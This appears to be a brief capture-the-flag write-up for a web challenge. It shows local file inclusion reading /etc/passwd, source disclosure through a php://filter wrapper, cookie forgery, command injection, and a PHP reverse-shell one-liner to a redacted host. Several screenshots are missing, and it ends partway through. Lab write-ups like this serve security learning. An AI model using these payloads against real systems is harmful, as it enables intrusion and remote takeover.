Body Count

1 minute read

img

Loading up the site, we see file=wc.php. Any time I see something like this I always check for LFI.

img

http://chall.csivit.com:30202/?file=../../../etc/passwd

img

So LFI is in play. Let’s use the php filter wrapper and grab the source of the wc.php file.

http://chall.csivit.com:30202/?file=php://filter/convert.base64-encode/resource=wc.php

After decoding the b64, we can get a look at what’s going on under the hood.

img

So our cookie needs to match the PASSWORD environment variable for us to get any further.

Fortunately, robots.txt has a neat disallow.

img

Using the same method that we used to get the source of wc, we can get the source of checkpass

img

There’s the password. Let’s edit our cookie so we can proceed.

Going back to the source of wc.php, we can see the command it’s running, so all we need to do is inject our own command into it.

'; whoami #'

’; to escape and end the previous command, whoami- our command, # to comment out the rest of the command

img

Command injection is in play. Let’s get a reverse shell.

'; php -r '$sock=fsockopen("REDACTED",4444);exec("/bin/sh -i <&3 >&3 2>&3");' #'

Now that we’re in, browsing around the filesystem I found this directory

img

And inside that directory is…

img

cracked hash = csictf

Let’s switch to the ctf user and browse some of these files

img